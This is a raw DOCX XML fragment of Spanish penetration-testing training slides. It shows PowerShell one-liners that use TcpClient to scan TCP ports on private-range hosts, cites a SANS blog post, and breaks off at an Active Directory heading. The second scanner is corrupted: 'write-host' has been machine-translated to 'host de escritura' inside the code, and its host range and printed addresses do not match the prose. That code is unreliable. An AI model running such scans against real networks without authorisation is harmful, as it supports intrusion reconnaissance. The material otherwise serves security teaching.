          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B38D2F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="144"/>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76416" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B5C1EF8" wp14:editId="781D08F3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1237488</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>268406</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9717405" cy="1231900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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7405" cy="1231900"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="682708CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3C892664" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="71"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7492B194" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:ind w:left="585"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1..1024 | % {echo ((new-object Net.Sockets.TcpClient). Connect("10.0.0.100",$_)) "</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>¡</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>El puerto $_ est</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>á</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> abierto!"} 2&gt;$null</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5B5C1EF8" id="Textbox 462" o:spid="_x0000_s1234" type="#_x0000_t202" style="position:absolute;margin-left:97.45pt;margin-top:21.15pt;width:765.15pt;height:97pt;z-index:-15640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" filled="f" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="682708CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3C892664" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="71"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7492B194" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:ind w:left="585"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1..1024 | % {echo ((new-object Net.Sockets.TcpClient). Connect("10.0.0.100",$_)) "</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>¡</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>El puerto $_ est</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>á</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> abierto!"} 2&gt;$null</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E024F0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="70"/>
        <w:ind w:left="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: https:// </w:t>
      </w:r>
      <w:hyperlink r:id="rId212">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="699FB98E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9E64F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="167"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CED51F5" wp14:editId="076DEB44">
                <wp:extent cx="11965305" cy="883919"/>
                <wp:effectExtent l="0" t="0" r="0" b="190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5305" cy="883919"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11965305" cy="883919"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="464" name="Image 464"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId213" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="11965028" cy="883822"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="465" name="Image 465"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId214" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164644" y="165241"/>
                            <a:ext cx="11649456" cy="566927"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="317CB84A" id="Group 463" o:spid="_x0000_s1026" style="width:942.15pt;height:69.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="119653,8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r3gHQ9O1H9nD4sahdafaz6hpt/orWd48KmeDzJLhZA&#10;smNwVgBlc4OAcZAryGiiueD/AHtRf4f/AEhG0v4cPn/6UFFFFdB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">
                <v:shape id="Image 464" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:119650;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">
                  <v:imagedata r:id="rId215" o:title=""/>
                </v:shape>
                <v:shape id="Image 465" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1652;width:116495;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">
                  <v:imagedata r:id="rId216" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A940C2E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA4203E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F75DB11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7761EE45" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="28"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FEB7C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1756"/>
        </w:tabs>
        <w:ind w:left="1756" w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El siguiente comando escaneará las direcciones IP 10.1.1.1-5 y algunos puertos TCP comunes específicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCA6DC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF9F26F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED652C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3172EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712776D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7C6EEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B8949A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E29A067" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFB5BB2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF9920F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="142"/>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77952" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EE73937" wp14:editId="278ABE96">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>309372</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266789</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11573510" cy="1016635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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3510" cy="1016635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0E7C3C24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4F1BFC9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="130"/>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7FB6A3BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:tabs>
                                <w:tab w:val="left" w:leader="hyphen" w:pos="3876"/>
                              </w:tabs>
                              <w:ind w:left="280"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:t>1..20 | % { $a = $_; write-host "</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>"; host de escritura "10.0.0.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient). connect("10.1.1.$a",$_)) "</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:t>¡</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:t>El puerto $_ est</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:t>á</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:b/>
                                <w:i/>
                              </w:rPr>
                              <w:t xml:space="preserve"> abierto!"} 2&gt;$null}</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1EE73937" id="Textbox 466" o:spid="_x0000_s1235" type="#_x0000_t202" style="position:absolute;margin-left:24.35pt;margin-top:21pt;width:911.3pt;height:80.05pt;z-index:-1563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" filled="f" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0E7C3C24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4F1BFC9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="130"/>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7FB6A3BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:tabs>
                          <w:tab w:val="left" w:leader="hyphen" w:pos="3876"/>
                        </w:tabs>
                        <w:ind w:left="280"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:t>1..20 | % { $a = $_; write-host "</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>"; host de escritura "10.0.0.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient). connect("10.1.1.$a",$_)) "</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:t>¡</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:t>El puerto $_ est</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:t>á</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:b/>
                          <w:i/>
                        </w:rPr>
                        <w:t xml:space="preserve"> abierto!"} 2&gt;$null}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="67650D7B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1120" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC32531"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819264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10BE3E89" wp14:editId="6D71D087">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1304925"/>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04925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1304925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="468" name="Graphic 468"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="469" name="Textbox 469"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5802339C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="389"/>
                                <w:ind w:left="3987"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>4.2.2 Aspectos esenciales de Active Directory</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="10BE3E89" id="Group 467" o:spid="_x0000_s1236" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:102.75pt;z-index:15819264;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 468" o:spid="_x0000_s1237" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
